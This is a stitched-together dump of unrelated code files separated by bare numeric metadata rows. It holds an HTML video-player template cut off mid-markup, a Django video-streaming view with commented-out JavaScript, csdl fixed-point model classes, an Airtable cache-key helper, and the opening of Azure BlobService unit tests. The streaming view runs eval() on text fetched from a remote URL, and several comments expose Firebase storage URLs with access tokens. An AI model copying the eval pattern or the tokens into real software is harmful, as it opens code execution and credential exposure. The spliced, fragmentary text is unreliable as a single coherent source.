<a href="#" class="dropdown-item playback">0.25</a>
<a href="#" class="dropdown-item playback">0.5</a>
<a href="#" class="dropdown-item playback">1</a>
<a href="#" class="dropdown-item playback">1.25</a>
<a href="#" class="dropdown-item playback">1.5</a>
<a href="#" class="dropdown-item playback">1.75</a>
<a href="#" class="dropdown-item playback">2</a>
<a href="#" class="dropdown-item qual">Auto</a>
<a href="#" class="dropdown-item qual">480p</a>
<a href="#" class="dropdown-item qual">720p</a>
<a href="#" class="dropdown-item qual">1080p</a>
</div>
</div>
<!-- picture-in-picture -->
<button id="pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span
class="px-4"><i id="pip-ico" class="fas fa-window-maximize"></i></span></button>
<!-- theatre view -->
<button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span
class="px-4"><i id="th-ico" class="fas fa-arrows-alt-v"></i></span></button>
<!-- fullscreen -->
<button id="fs" class="fs__button" data-toggle="tooltip" title="fullscreen"><span
class="px-4"><i id="fs-ico" class="fas fa-expand"></i></span></button>
</div>
</div>
</div>
</div>
<!-- else this -->
<!-- pay cost per video -->
<!-- <div class="text-center text-muted text-white">
pay $(number) to watch this video
<button class="btn btn-primary btn-sm" type="button">Pay</button>
</div> -->
</div>
<!-- sidebar content -->
<div class="col-xl-3 col-lg-4 col-md-5 playlist-container" style="background: white;color: black;">
<div class="card comment">
<div class="card-header">
<h4>comments</h4>
</div>
<div class="card-body">
<ul id="vid-comments">
<li>
<div class="row media">
<div class="col-xl-2 col-lg-2 col-md-2 col-sm-2">
<!-- user-profile -->
<img src="/img/img1.png" alt="" class="img-fluid">
</div>
<!-- video-desccription -->
<div class="col-xl-10 col-lg-10 col-md-10 col-sm-10">
<div class="media-body px-1">
<span class="font-weight-bold">
S1 E1 - date
</span>
<div class="d-cent text-justify">
Lorem ipsum dolor sit amet consectetur adipisicing elit.
Distinctio doloribus explicabo enim quae tenetur omnis, optio
dolorem et. Eaque similique obcaecati laborum blanditiis
officiis veniam maxime veritatis alias inventore voluptates!
</div>
<button type="button" class="flg-comm-button px-2" data-toggle="modal"
data-target="#flagCommentCenter">
<i class="fas fa-flag"></i>
</button>
<button type="button" class="show-mr-button">
show
</button>
</div>
</div>
</div>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="whole-sect">
<div class="container-fluid">
<div class="row">
<div class="col-xl-9 col-lg-6 col-md-7">
<!-- description flag section -->
<div class="container-fluid descript-sect my-4">
<div class="row">
<div class="col-xl-8 col-lg-8 col-md-8">
<div class="vid-desc text-left pb-3">
<div class="vid-hd py-1" id="video_description_1">
Series name || Season name || Episode name || SNo.ENo || Date
</div>
<div class="vid-cat py-1" id="video_description_2">
Categories || Language || Subcategories || tags
</div>
<div class="vid-des py-1" id="video_description_3">
Description of videos
</div>
</div>
</div>
<div class="col-xl-4 col-lg-6 col-md-4 pb-3">
<div class="flg-sect d-flex flex-row-reverse align-items-end">
<button type="button" class="add-to-fav mx-3" data-toggle="tooltip"
data-placement="bottom" title="Add to favourites">
<span class="ico-cont bg-danger text-center py-2 px-2">
<span class="py-3">
<i class="fas fa-plus"></i>
</span>
</span>
<p class="add-to-fav-title py-3">Favourites</p>
</button>
<button type="button" class="vid-flag mx-3" data-toggle="modal"
data-target="#flagCenter">
<span class="ico-cont bg-danger text-center py-2 px-2">
<span class="py-3">
<i class="fas fa-flag"></i>
</span>
</span>
<p class="add-to-flag py-3">Flag</p>
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
import requests
def response_iter(url, first_byte):
ran = 'bytes=' + str(first_byte) + '-'
headers = {'Range': ran}
r = requests.get(url, headers=headers, stream=True)
# r.raise_for_status()
# with open("/home/harshit/Desktop/webster2020/check.mp4", 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk: # filter out keep-alive new chunks
# print(chunk)
yield chunk
# def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# with open(file_name, "rb") as f:
# f.seek(offset, os.SEEK_SET)
# remaining = length
# while True:
# bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# data = f.read(bytes_length)
# if not data:
# break
# if remaining:
# remaining -= len(data)
# # print(data)
# yield data
from django.views.decorators.http import condition
@condition(etag_func=None)
def stream_video(request, video_obj):
# print(request.META)
if video_obj.video_type == 1:
video_details = FreeSeriesVideos.objects.filter(video_id=video_obj).first()
if video_details is None:
video_details = FreeMovieVideo.objects.filter(video_id=video_obj).first()
elif video_obj.video_type == 2:
video_details = SeriesVideos.objects.filter(video_id=video_obj).first()
elif video_obj.video_type == 3:
video_details = MovieVideo.objects.filter(video_id=video_obj).first()
# getting firebase url for uploaded video file
path_on_cloud = 'videos/' + video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[video_details.extension]
firebase_video_url = storage.child(path_on_cloud).get_url(video_details.firebase_token)
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c'
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F0b3aaf33-f04d-4949-aafc-f147571b2a6e.mp4?alt=media&token=0c45781c-001f-48f4-a7cd-ed0f569f5c1d'
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F05628f4f-11b2-4bb0-bc93-76bb13fa3221.mp4?alt=media&token=47726f97-1404-40bf-bdf9-75b389c8f836'
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fa5674582-2005-4f44-a9b0-abc25016a246.mp4?alt=media&token=d74a389b-ce2a-478f-9c16-4d68fd95c9d8'
# firebase_video_url = '/home/harshit/Desktop/webster2020/song.mp4'
# path = '/home/harshit/Desktop/webster2020/sample_video.mp4'
range_header = request.META.get('HTTP_RANGE', '').strip()
range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
range_match = range_re.match(range_header)
base_url = str(firebase_video_url).split('?')[0]
video_details = requests.get(base_url).text
details_dict = eval(video_details)
size = int(details_dict['size'])
if range_match:
print("range perfect")
first_byte, last_byte = range_match.groups()
first_byte = int(first_byte) if first_byte else 0
last_byte = int(last_byte) if last_byte else size - 1
if last_byte >= size:
last_byte = size - 1
length = last_byte - first_byte + 1
content_type = 'video/mp4'
# <generator object response_iter at 0x7f23487eb6d0>
resp = StreamingHttpResponse(response_iter(firebase_video_url, first_byte), status=206, content_type=content_type)
# resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
resp['Content-Length'] = str(length)
resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
# print('response sent')
# os.remove(video_fragment_save_path)
else:
return render(request, 'templates/404.html')
# print("range not fine")
# extension = str(firebase_video_url).split('?')[0][-3:]
# unique_video_name = str(uuid.uuid4())
# video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + 'flv'
# req = urllib.request.Request(firebase_video_url)
# req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0')
# # req.add_header('Range', range_header) # <=== range header
# res = urllib.request.urlopen(req)
# with open(video_fragment_save_path, 'wb') as f:
# f.write(res.read())
# content_type, encoding = mimetypes.guess_type(video_fragment_save_path)
# content_type = content_type or 'application/octet-stream'
# # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
# resp = StreamingHttpResponse(FileWrapper(open(video_fragment_save_path, 'rb')), content_type=content_type)
# resp['Content-Length'] = str(size)
# # os.remove(video_fragment_save_path)
resp['accept-ranges'] = 'bytes'
print('go')
return resp
def fetch_video(request, video_id):
video_obj = Videos.objects.filter(video_id=video_id).first()
if video_obj:
if video_obj.video_type == 1:
return stream_video(request, video_obj)
else:
if request.user.is_authenticated:
# checking logged in user subscription plan details
subscribe = Subscriptions.objects.filter(user=request.user, end_date__gt=datetime.now(tz=timezone.utc)).order_by('-end_date').first()
if subscribe:
return stream_video(request, video_obj)
else:
return render(request, 'templates/404.html')
else:
return render(request, 'templates/404.html')
else:
return render(request, 'templates/404.html')
# @csrf_exempt
# def stream_movie(request):
# if request.method == 'POST' and request.user.user_type == 'U':
# # extracting form data coming from ajax request
# json_data = json.loads(request.POST['data'])
# movie_id = json_data['movie_id']
# movie_start_time = json_data['start_time']
# print(movie_start_time)
# # response object to return as response to ajax request
# context = {
# 'is_movie_exists': '',
# 'is_user_subscribed': '',
# 'is_successful': '',
# 'stream': '',
# 'movie_duration': '',
# }
# # checking if movie exists
# movie_details = MovieDetails.objects.filter(movie_id=movie_id).first()
# if movie_details is None:
# context['is_movie_exists'] = 'This movie do not exists'
# else:
# # checking logged in user subscription plan details
# subscribe = Subscriptions.objects.filter(user=request.user, end_date__gt=datetime.now(tz=timezone.utc)).order_by('-end_date').first()
# if subscribe:
# # fetching movie video details for the movie
# movie_video_details = MovieVideo.objects.filter(movie_id=movie_details).first()
# # getting firebase url for uploaded video file
# path_on_cloud = 'videos/' + movie_video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[movie_video_details.extension]
# firebase_video_url = storage.child(path_on_cloud).get_url(movie_video_details.firebase_token)
# start_time = movie_start_time
# end_time = start_time + 10
# if end_time > movie_video_details.duration_of_video:
# end_time = movie_video_details.duration_of_video
# extension = str(firebase_video_url).split('?')[0][-3:]
# unique_video_name = str(uuid.uuid4())
# video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + extension
# ffmpeg_extract_subclip("https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c", start_time, end_time, targetname=video_fragment_save_path)
# with open(video_fragment_save_path, "rb") as videoFile:
# text = base64.b64encode(videoFile.read()).decode('utf-8')
# # print(text)
# context['stream'] = text
# context['movie_duration'] = movie_video_details.duration_of_video
# os.remove(video_fragment_save_path)
# context['is_successful'] = 'Packet fetched successfully'
# else:
# context['is_user_subscribed'] = 'You are not subscribed to watch this movie. Go buy a subscription plan.'
# return JsonResponse(context)
# else:
# return render(request, 'templates/404.html')
# play movie frontend code
// javascript data object
// var data = {
// 'movie_id': movie_id,
// 'start_time': video.currentTime,
// }
// // adding data to javascript form which is to be send over ajax request
// var formData = new FormData();
// formData.append('data', JSON.stringify(data));
// $.ajax({
// type: 'POST',
// url: '',
// data: formData,
// dataType: 'json',
// enctype: 'multipart/form-data',
// processData: false,
// contentType: false,
// success: function (data) {
// // checking and handling error conditions
// if (data.is_movie_exists != '') {
// alert(data.is_movie_exists);
// } else if (data.is_user_subscribed != '') {
// alert(data.is_user_subscribed);
// } else if (data.is_successful != '') {
// console.log('called');
// var byteCharacters = atob(data.stream);
// var byteNumbers = new Array(byteCharacters.length);
// for (let i = 0; i < byteCharacters.length; i++) {
// byteNumbers[i] = byteCharacters.charCodeAt(i);
// }
// // Show loading animation.
// var playPromise = video.play();
// if (playPromise !== undefined) {
// playPromise.then(_ => {
// // Automatic playback started!
// // Show playing UI.
// })
// .catch(error => {
// // Auto-play was prevented
// // Show paused UI.
// });
// }
// movie_total_duration = data.movie_duration
// var blobArray = [];
// blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
// var currentTime = video.currentTime;
// var blob = new Blob(blobArray,{'type':'video/mp4'});
// video.src = window.URL.createObjectURL(blob);
// video.currentTime = currentTime;
// movie_previous_time_watched = 0; // if using history add history time
// movie_maxtime_fetched = Math.min(currentTime + 10, movie_total_duration);
// $('.progress__filled').css('flex', '0');
// video.play();
// } else {
// alert('Some unexpected error has occured. Try again.');
// }
// }
// });
// HTML CODE FOR VIDEO PLAYER
var playerhtml = '<!-- video running section --><div class="runner-section container-fluid"><div class="row"><!-- video-player --><div class="col-xl-9 col-lg-8 col-md-7 player-wrapper"><!-- if paid --><div class="player" id="movie-video-player"><!-- video-head --><div class="video-head"><div class="text-white"><h3 class="font-weight-bold">movie name</h4></div></div><!-- video-body --><div class="video-body"><video class="player__video viewer" id="movie-video" preload="metadata"><source src="" id="movie-insert-vid" type="video/mp4"></video></div><!-- video-footer --><div class="video-footer"><div class="player__controls" id="movie-plact"><!-- progress-bar --><div class="progress"><div class="progress__filled"></div></div><!-- play/pause --><button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="movie-play-icon" class="fas fa-play"></i></button><!-- skip 10s backword --><button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">«10s</button><!-- skip 10s forward --><button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s»</button><!-- volume --><button class="volume__button" data-toggle="tooltip" title="mute" id="movie-volume"><i id="movie-vol-ico" class="fas fa-volume-up"></i></button><input type="range" name="volume" id="movie-vol-ran" class="player__slider" min="0" max="1" step="0.05" value="1"><!-- video timer --><button id="movie-progressTime" class="timer__button"><span id="movie-current">00:00 / </span><span id="movie-duration">00:00</span></button><!-- playbackrate --><!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> --><div class="fullscreen"><!-- setting --><!-- <button id="movie-setting" class="setting__button" data-toggle="tooltip" title="setting"><span class="px-4"><i id="movie-setting-ico" class="fas fa-cog"></i></span></button> --><button type="button" class="prev-button mr-3"><i class="fas fa-step-backward"></i></button><button type="button" class="next-button"><i class="fas fa-step-forward"></i></button><div class="btn-group dropup"><button id="movie-setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true"aria-expanded="false"><span class="px-4"><i id="movie-setting-ico" class="fas fa-cog"></i></span></button><div class="dropdown-menu plbcrt"><a href="#" class="dropdown-item playbacki dis">Playback speed</a><a href="#" class="dropdown-item quali dis">Video Quality</a><a href="#" class="dropdown-item shortcuts dis">Keyboard shortcuts</a><a href="#" class="dropdown-item playback">0.25</a><a href="#" class="dropdown-item playback">0.5</a><a href="#" class="dropdown-item playback">1</a><a href="#" class="dropdown-item playback">1.25</a><a href="#" class="dropdown-item playback">1.5</a><a href="#" class="dropdown-item playback">1.75</a><a href="#" class="dropdown-item playback">2</a><a href="#" class="dropdown-item qual">Auto</a><a href="#" class="dropdown-item qual">480p</a><a href="#" class="dropdown-item qual">720p</a><a href="#" class="dropdown-item qual">1080p</a></div></div><!-- picture-in-picture --><button id="movie-pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span class="px-4"><i id="movie-pip-ico" class="fas fa-window-maximize"></i></span></button><!-- theatre view --><button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span class="px-4"><i id="movie-th-ico" class="fas fa-arrows-alt-v"></i></span></button><!-- fullscreen --><button id="movie-fs" class="fs__button" data-toggle="tooltip" title="fullscreen"><span class="px-4"><i id="movie-fs-ico" class="fas fa-expand"></i></span></button></div></div></div></div><!-- else this --><!-- pay cost per video --><div class="text-center text-muted text-white">pay $(number) to watch this video <button class="btn btn-primary btn-sm" type="button">Pay</button></div></div><!-- sidebar content --><div class="col-xl-3 col-lg-6 col-md-5"><div style="background-color: white;color: black;" class="card comment"><div class="card-header"><h4>Comments</h4></div><div class="card-body"><ul id="movie-vid-comments"><li><div class="row media"><div class="col-xl-2 col-lg-2 col-md-2 col-sm-2"><!-- user-profile --><img src="/img/img1.png" alt="" class="img-fluid"></div><!-- video-desccription --><div class="col-xl-10 col-lg-10 col-md-10 col-sm-10"><div class="media-body px-1"><span class="font-weight-bold">S1 E1 - date</span><div class="d-cent text-justify">Lorem ipsum dolor sit amet consectetur adipisicing elit.Distinctio doloribus explicabo enim quae tenetur omnis, optiodolorem et. Eaque similique obcaecati laborum blanditiis officiis veniam maxime veritatis alias inventore voluptates!</div><button type="button" class="flg-comm-button px-2" data-toggle="modal" data-target="#flagCommentCenter"><i class="fas fa-flag"></i></button><button type="button" class="show-mr-button">show</button></div></div></div></li></ul></div></div></div></div></div>';
| 55.675313
| 5,020
| 0.53087
| 6,683
| 62,245
| 4.828071
| 0.118959
| 0.017356
| 0.013017
| 0.02343
| 0.841102
| 0.824459
| 0.80918
| 0.790647
| 0.779396
| 0.771369
| 0
| 0.038242
| 0.324058
| 62,245
| 1,117
| 5,021
| 55.725157
| 0.728502
| 0
| 0
| 0.46841
| 0
| 0.008715
| 0.254647
| 0.062309
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006536
| null | null | 0.019608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14e8a62658af4ef1e8df1a947d96c229d67ee19a
| 1,637
|
py
|
Python
|
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | null | null | null |
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | null | null | null |
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | 1
|
2021-10-04T19:40:32.000Z
|
2021-10-04T19:40:32.000Z
|
from csdl import Model
class FixedPoint1(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - (3 + x - 2 * x**2)**(1 / 4))
class FixedPoint2(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - ((x + 3 - x**4) / 2)**(1 / 4))
class FixedPoint3(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - 0.5 * x)
class FixedPoint1Expose(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - (3 + x - 2 * x**2)**(1 / 4))
self.register_output('t1', x**2)
class FixedPoint2Expose(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - ((x + 3 - x**4) / 2)**(1 / 4))
self.register_output('t2', x**2)
class FixedPoint3Expose(Model):
def initialize(self):
self.parameters.declare('name', types=str)
def define(self):
x = self.declare_variable(self.parameters['name'])
r = self.register_output('r', x - 0.5 * x)
| 27.283333
| 72
| 0.602932
| 218
| 1,637
| 4.463303
| 0.151376
| 0.172662
| 0.147996
| 0.135663
| 0.855087
| 0.855087
| 0.818088
| 0.818088
| 0.818088
| 0.818088
| 0
| 0.02692
| 0.228467
| 1,637
| 59
| 73
| 27.745763
| 0.743468
| 0
| 0
| 0.769231
| 0
| 0
| 0.035431
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.025641
| 0
| 0.487179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
090b0157a35a947332527208ab1dd476a79be2ac
| 103
|
py
|
Python
|
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
def airtable_import_job_progress_key(job_id: int):
return f"airtable_import_job_progress_{job_id}"
| 34.333333
| 51
| 0.834951
| 17
| 103
| 4.470588
| 0.588235
| 0.368421
| 0.447368
| 0.657895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087379
| 103
| 2
| 52
| 51.5
| 0.808511
| 0
| 0
| 0
| 0
| 0
| 0.359223
| 0.359223
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 1
| 0.5
| 2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
f5079ab3b6a347497e9ac256bf2ff98d3c639398
| 84,057
|
py
|
Python
|
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import base64
import datetime
import httplib
import os
import time
import unittest
from azure import (WindowsAzureError,
WindowsAzureConflictError,
BLOB_SERVICE_HOST_BASE,
)
from azure.http import (HTTPRequest,
HTTPResponse,
)
from azure.storage import (AccessPolicy,
BlobBlockList,
BlobResult,
Logging,
Metrics,
PageList,
PageRange,
SignedIdentifier,
SignedIdentifiers,
StorageServiceProperties,
)
from azure.storage.blobservice import BlobService
from azure.storage.storageclient import (AZURE_STORAGE_ACCESS_KEY,
AZURE_STORAGE_ACCOUNT,
EMULATED,
DEV_ACCOUNT_NAME,
DEV_ACCOUNT_KEY,
)
from azure.storage.sharedaccesssignature import (Permission,
SharedAccessSignature,
SharedAccessPolicy,
WebResource,
RESOURCE_BLOB,
RESOURCE_CONTAINER,
SHARED_ACCESS_PERMISSION,
SIGNED_EXPIRY,
SIGNED_IDENTIFIER,
SIGNED_PERMISSION,
SIGNED_RESOURCE,
SIGNED_RESOURCE_TYPE,
SIGNED_SIGNATURE,
SIGNED_START,
)
from util import (AzureTestCase,
credentials,
getUniqueTestRunID,
getUniqueNameBasedOnCurrentTime,
)
#------------------------------------------------------------------------------
class BlobServiceTest(AzureTestCase):
def setUp(self):
self.bc = BlobService(credentials.getStorageServicesName(),
credentials.getStorageServicesKey())
self.bc.set_proxy(credentials.getProxyHost(),
credentials.getProxyPort(),
credentials.getProxyUser(),
credentials.getProxyPassword())
__uid = getUniqueTestRunID()
container_base_name = u'mytestcontainer%s' % (__uid)
self.container_name = getUniqueNameBasedOnCurrentTime(container_base_name)
self.container_lease_id = None
self.additional_container_names = []
def tearDown(self):
self.cleanup()
return super(BlobServiceTest, self).tearDown()
def cleanup(self):
if self.container_lease_id:
try:
self.bc.lease_container(self.container_name, 'release', self.container_lease_id)
except: pass
try:
self.bc.delete_container(self.container_name)
except: pass
for name in self.additional_container_names:
try:
self.bc.delete_container(name)
except: pass
#--Helpers-----------------------------------------------------------------
def _create_container(self, container_name):
self.bc.create_container(container_name, None, None, True)
def _create_container_and_block_blob(self, container_name, blob_name, blob_data):
self._create_container(container_name)
resp = self.bc.put_blob(container_name, blob_name, blob_data, 'BlockBlob')
self.assertIsNone(resp)
def _create_container_and_page_blob(self, container_name, blob_name, content_length):
self._create_container(container_name)
resp = self.bc.put_blob(self.container_name, blob_name, '', 'PageBlob', x_ms_blob_content_length=str(content_length))
self.assertIsNone(resp)
def _create_container_and_block_blob_with_random_data(self, container_name, blob_name, block_count, block_size):
self._create_container_and_block_blob(container_name, blob_name, '')
block_list = []
for i in range(0, block_count):
block_id = '{0:04d}'.format(i)
block_data = os.urandom(block_size)
self.bc.put_block(container_name, blob_name, block_data, block_id)
block_list.append(block_id)
self.bc.put_block_list(container_name, blob_name, block_list)
def _blob_exists(self, container_name, blob_name):
resp = self.bc.list_blobs(container_name)
for blob in resp:
if blob.name == blob_name:
return True
return False
def _get_permission(self, sas, resource_type, resource_path, permission):
date_format = "%Y-%m-%dT%H:%M:%SZ"
start = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
expiry = start + datetime.timedelta(hours=1)
sap = SharedAccessPolicy(AccessPolicy(start.strftime(date_format),
expiry.strftime(date_format),
permission))
signed_query = sas.generate_signed_query_string(resource_path,
resource_type,
sap)
return Permission('/' + resource_path, signed_query)
def _get_signed_web_resource(self, sas, resource_type, resource_path, permission):
web_rsrc = WebResource()
web_rsrc.properties[SIGNED_RESOURCE_TYPE] = resource_type
web_rsrc.properties[SHARED_ACCESS_PERMISSION] = permission
web_rsrc.path = '/' + resource_path
web_rsrc.request_url = '/' + resource_path
return sas.sign_request(web_rsrc)
def _get_request(self, host, url):
return self._web_request('GET', host, url, None)
def _put_request(self, host, url, content):
return self._web_request('PUT', host, url, content)
def _del_request(self, host, url):
return self._web_request('DELETE', host, url, None)
def _web_request(self, method, host, url, content):
connection = httplib.HTTPConnection(host)
connection.putrequest(method, url)
connection.putheader('Content-Type', 'application/octet-stream;Charset=UTF-8')
if content is not None:
connection.putheader('Content-Length', str(len(content)))
connection.endheaders()
if content is not None:
connection.send(content)
resp = connection.getresponse()
resp.getheaders()
respbody = None
if resp.length is None:
respbody = resp.read()
elif resp.length > 0:
respbody = resp.read(resp.length)
return respbody
#--Test cases for blob service --------------------------------------------
def test_create_blob_service_missing_arguments(self):
# Arrange
if os.environ.has_key(AZURE_STORAGE_ACCOUNT):
del os.environ[AZURE_STORAGE_ACCOUNT]
if os.environ.has_key(AZURE_STORAGE_ACCESS_KEY):
del os.environ[AZURE_STORAGE_ACCESS_KEY]
if os.environ.has_key(EMULATED):
del os.environ[EMULATED]
# Act
with self.assertRaises(WindowsAzureError):
bs = BlobService()
# Assert
def test_create_blob_service_env_variables(self):
# Arrange
os.environ[AZURE_STORAGE_ACCOUNT] = credentials.getStorageServicesName()
os.environ[AZURE_STORAGE_ACCESS_KEY] = credentials.getStorageServicesKey()
# Act
bs = BlobService()
if os.environ.has_key(AZURE_STORAGE_ACCOUNT):
del os.environ[AZURE_STORAGE_ACCOUNT]
if os.environ.has_key(AZURE_STORAGE_ACCESS_KEY):
del os.environ[AZURE_STORAGE_ACCESS_KEY]
# Assert
self.assertIsNotNone(bs)
self.assertEquals(bs.account_name, credentials.getStorageServicesName())
self.assertEquals(bs.account_key, credentials.getStorageServicesKey())
self.assertEquals(bs.is_emulated, False)
def test_create_blob_service_emulated_true(self):
# Arrange
os.environ[EMULATED] = 'true'
# Act
bs = BlobService()
if os.environ.has_key(EMULATED):
del os.environ[EMULATED]
# Assert
self.assertIsNotNone(bs)
self.assertEquals(bs.account_name, DEV_ACCOUNT_NAME)
self.assertEquals(bs.account_key, DEV_ACCOUNT_KEY)
self.assertEquals(bs.is_emulated, True)
def test_create_blob_service_emulated_false(self):
# Arrange
os.environ[EMULATED] = 'false'
# Act
with self.assertRaises(WindowsAzureError):
bs = BlobService()
if os.environ.has_key(EMULATED):
del os.environ[EMULATED]
# Assert
def test_create_blob_service_emulated_false_env_variables(self):
# Arrange
os.environ[EMULATED] = 'false'
os.environ[AZURE_STORAGE_ACCOUNT] = credentials.getStorageServicesName()
os.environ[AZURE_STORAGE_ACCESS_KEY] = credentials.getStorageServicesKey()
# Act
bs = BlobService()
if os.environ.has_key(EMULATED):
del os.environ[EMULATED]
if os.environ.has_key(AZURE_STORAGE_ACCOUNT):
del os.environ[AZURE_STORAGE_ACCOUNT]
if os.environ.has_key(AZURE_STORAGE_ACCESS_KEY):
del os.environ[AZURE_STORAGE_ACCESS_KEY]
# Assert
self.assertIsNotNone(bs)
self.assertEquals(bs.account_name, credentials.getStorageServicesName())
self.assertEquals(bs.account_key, credentials.getStorageServicesKey())
self.assertEquals(bs.is_emulated, False)
#--Test cases for containers -----------------------------------------
def test_create_container_no_options(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name)
# Assert
self.assertTrue(created)
def test_create_container_no_options_fail_on_exist(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name, None, None, True)
# Assert
self.assertTrue(created)
def test_create_container_with_already_existing_container(self):
# Arrange
# Act
created1 = self.bc.create_container(self.container_name)
created2 = self.bc.create_container(self.container_name)
# Assert
self.assertTrue(created1)
self.assertFalse(created2)
def test_create_container_with_already_existing_container_fail_on_exist(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name)
with self.assertRaises(WindowsAzureError):
self.bc.create_container(self.container_name, None, None, True)
# Assert
self.assertTrue(created)
def test_create_container_with_public_access_container(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name, None, 'container')
# Assert
self.assertTrue(created)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
